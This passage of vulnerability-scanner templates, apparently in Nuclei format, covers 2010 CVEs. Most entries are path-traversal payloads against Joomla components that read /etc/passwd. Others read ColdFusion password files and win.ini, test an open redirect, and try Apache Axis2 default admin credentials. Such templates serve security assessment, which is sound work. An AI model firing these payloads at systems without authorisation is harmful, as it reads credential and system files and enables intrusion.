Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_communitypolls&controller=../../../../../../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1306","info":{"name":"Joomla! Component Picasa 2.0 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_joomlapicasa2&controller=../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-2128","info":{"name":"Joomla! Component JE Quotation Form 1.0b1 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_jequoteform&view=../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-0157","info":{"name":"Joomla! Component com_biblestudy - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_biblestudy&id=1&view=studieslist&controller=../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1352","info":{"name":"Joomla! Component Juke Box 1.7 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_jukebox&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1302","info":{"name":"Joomla! Component DW Graph - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_dwgraphs&controller=../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-2861","info":{"name":"Adobe ColdFusion 8.0/8.0.1/9.0/9.0.1 LFI","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/CFIDE/administrator/enter.cfm?locale=../../../../../../../lib/password.properties%00en"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["rdspassword=","encrypted="],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1354","info":{"name":"Joomla! Component VJDEO 1.0 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_vjdeo&controller=../../../../../../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1532","info":{"name":"Joomla! Component PowerMail Pro 1.5.3 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_powermail&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1954","info":{"name":"Joomla! Component iNetLanka Multiple root 1.0 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_multiroot&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-4617","info":{"name":"Joomla! Component JotLoader 2.2.1 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_jotloader&section=../../../../../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1979","info":{"name":"Joomla! Component Affiliate Datafeeds 880 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_datafeeds&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-0972","info":{"name":"Joomla! Component com_gcalendar Suite 2.1.5 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_gcalendar&controller=../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-2033","info":{"name":"Joomla! Percha Categories Tree 0.6 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_perchacategoriestree&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1307","info":{"name":"Joomla! Component Magic Updater - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_joomlaupdater&controller=../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-2259","info":{"name":"Joomla! Component com_bfsurvey - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_bfsurvey&controller=../../../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1472","info":{"name":"Joomla! Component Horoscope 1.5.0 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_horoscope&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1980","info":{"name":"Joomla! Component Joomla! Flickr 1.0 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_joomlaflickr&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-4977","info":{"name":"Joomla! Component Canteen 1.0 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_canteen&controller=../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-4239","info":{"name":"Tiki Wiki CMS Groupware 5.2 - Local File Inclusion","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/tiki-jsplugin.php?plugin=x&language=../../../../../../../../../../windows/win.ini"],"matchers":[{"type":"word","part":"body","words":["bit app support","fonts","extensions"],"condition":"and"}]}]},{"id":"CVE-2010-1478","info":{"name":"Joomla! Component Jfeedback 1.2 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_jfeedback&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1717","info":{"name":"Joomla! Component iF surfALERT 1.2 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_if_surfalert&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1056","info":{"name":"Joomla! Component com_rokdownloads - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_rokdownloads&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1345","info":{"name":"Joomla! Component Cookex Agency CKForms - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_ckforms&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1305","info":{"name":"Joomla! Component JInventory 1.23.02 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_jinventory&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1476","info":{"name":"Joomla! Component AlphaUserPoints 1.5.5 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_alphauserpoints&view=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-4769","info":{"name":"Joomla! Component Jimtawl 1.0.2 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_jimtawl&Itemid=12&task=../../../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1718","info":{"name":"Joomla! Component Archery Scores 1.0.6 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_archeryscores&controller=../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1952","info":{"name":"Joomla! Component BeeHeard 1.0 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_beeheard&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1540","info":{"name":"Joomla! Component com_blog - Directory Traversal","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_myblog&Itemid=1&task=../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1657","info":{"name":"Joomla! Component SmartSite 1.0.0 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_smartsite&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-2036","info":{"name":"Joomla! Component Percha Fields Attach 1.0 - Directory Traversal","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_perchafieldsattach&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1956","info":{"name":"Joomla! Component Gadget Factory 1.0.0 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_gadgetfactory&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1658","info":{"name":"Joomla! Component NoticeBoard 1.3 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_noticeboard&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1304","info":{"name":"Joomla! Component User Status - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_userstatus&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1722","info":{"name":"Joomla! Component Online Market 2.x - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_market&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-2680","info":{"name":"Joomla! Component jesectionfinder - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/propertyfinder/component/jesectionfinder/?view=../../../../../../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1313","info":{"name":"Joomla! Component Saber Cart 1.0.0.12 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_sebercart&view=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1474","info":{"name":"Joomla! Component Sweetykeeper 1.5 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_sweetykeeper&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-0943","info":{"name":"Joomla! Component com_jashowcase - Directory Traversal","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_jashowcase&view=jashowcase&controller=../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1470","info":{"name":"Joomla! Component Web TV 1.0 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_webtv&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1953","info":{"name":"Joomla! Component iNetLanka Multiple Map 1.0 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_multimap&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1473","info":{"name":"Joomla! Component Advertising 0.25 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_advertising&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1659","info":{"name":"Joomla! Component Ultimate Portfolio 1.0 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_ultimateportfolio&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-0696","info":{"name":"Joomla! Component Jw_allVideos - Arbitrary File Retrieval","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/plugins/content/jw_allvideos/includes/download.php?file=../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1535","info":{"name":"Joomla! Component TRAVELbook 1.0.1 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_travelbook&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1603","info":{"name":"Joomla! Component ZiMBCore 0.1 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_zimbcore&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-5278","info":{"name":"MODx manager - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/manager/controllers/default/resource/tvs.php?class_key=../../../../../../../../../../windows/win.ini%00"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["bit app support","fonts","extensions"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1586","info":{"name":"HP System Management Homepage (SMH) v2.x.x.x - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/red2301.html?RedirectUrl=http://interact.sh"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:http?://|//)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh.*$"]}]}]},{"id":"CVE-2010-1533","info":{"name":"Joomla! Component TweetLA 1.0.1 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_tweetla&controller=../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-2050","info":{"name":"Joomla! Component MS Comment 0.8.0b - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_mscomment&controller=../../../../../../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-2037","info":{"name":"Joomla! Component Percha Downloads Attach 1.1 - Directory Traversal","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_perchadownloadsattach&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-2307","info":{"name":"Motorola SBV6120E SURFboard Digital Voice Modem SBV6X2X-1.0.0.5-SCM - Directory Traversal","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1314","info":{"name":"Joomla! Component Highslide 1.5 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_hsconfig&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-2507","info":{"name":"Joomla! Component Picasa2Gallery 1.2.8 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_picasa2gallery&controller=../../../../../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1219","info":{"name":"Joomla! Component com_janews - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_janews&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1312","info":{"name":"Joomla! Component News Portal 1.5.x - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_news_portal&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1494","info":{"name":"Joomla! Component AWDwall 1.5.4 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_awdwall&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1471","info":{"name":"Joomla! Component Address Book 1.5.0 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_addressbook&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1429","info":{"name":"Red Hat JBoss Enterprise Application Platform - Sensitive Information Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/status?full=true"],"matchers-condition":"and","matchers":[{"type":"word","words":["JVM","memory","localhost/"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-2035","info":{"name":"Joomla! Component Percha Gallery 1.6 Beta - Directory Traversal","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_perchagallery&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1714","info":{"name":"Joomla! Component Arcade Games 1.0 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_arcadegames&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1875","info":{"name":"Joomla! Component Property - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_properties&controller=../../../../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-0942","info":{"name":"Joomla! Component com_jvideodirect - Directory Traversal","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_jvideodirect&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-2920","info":{"name":"Joomla! Component Foobla Suggestions 1.5.1.2 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_foobla_suggestions&controller=../../../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1983","info":{"name":"Joomla! Component redTWITTER 1.0 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_redtwitter&view=../../../../../../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1957","info":{"name":"Joomla! Component Love Factory 1.3.4 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_lovefactory&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1607","info":{"name":"Joomla! Component WMI 1.5.0 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_wmi&controller=../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1723","info":{"name":"Joomla! Component iNetLanka Contact Us Draw Root Map 1.1 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_drawroot&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-4231","info":{"name":"Camtron CMNC-200 IP Camera - Directory Traversal","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/../../../../../../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1602","info":{"name":"Joomla! Component ZiMB Comment 0.8.1 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_zimbcomment&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1981","info":{"name":"Joomla! Component Fabrik 2.0 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_fabrik&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-2122","info":{"name":"Joomla! Component simpledownload <=0.9.5 - Arbitrary File Retrieval","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_simpledownload&task=download&fileid=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-0219","info":{"name":"Apache Axis2 Default Login","severity":"critical"},"requests":[{"raw":["POST /axis2-admin/login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nloginUsername={{username}}&loginPassword={{password}}\n","POST /axis2/axis2-admin/login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nuserName={{username}}&password={{password}}&submit=+Login+\n"],"payloads":{"username":["admin"],"password":["axis2"]},"attack":"pitchfork","matchers-condition":"and","matchers":[{"type":"word","words":["<h1>Welcome to Axis2 Web Admin Module !!</h1>"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1340","info":{"name":"Joomla! Component com_jresearch - 'Controller' Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_jresearch&controller=../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1469","info":{"name":"Joomla! Component JProject Manager 1.0 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_jprojectmanager&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1955","info":{"name":"Joomla! Component Deluxe Blog Factory 1.1.2 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_blogfactory&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-3203","info":{"name":"Joomla! Component PicSell 1.0 - Arbitrary File Retrieval","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_picsell&controller=prevsell&task=dwnfree&dflink=../../../configuration.php"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1653","info":{"name":"Joomla! Component Graphics 1.0.6 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_graphics&controller=../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-2857","info":{"name":"Joomla! Component Music Manager - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/component/music/album.html?cid=../../../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1858","info":{"name":"Joomla! Component SMEStorage - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_smestorage&controller=../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1353","info":{"name":"Joomla! Component LoginBox - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_loginbox&view=../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1715","info":{"name":"Joomla! Component Online Exam 1.5.0 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_onlineexam&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1491","info":{"name":"Joomla! Component MMS Blog 2.3.0 - Local File 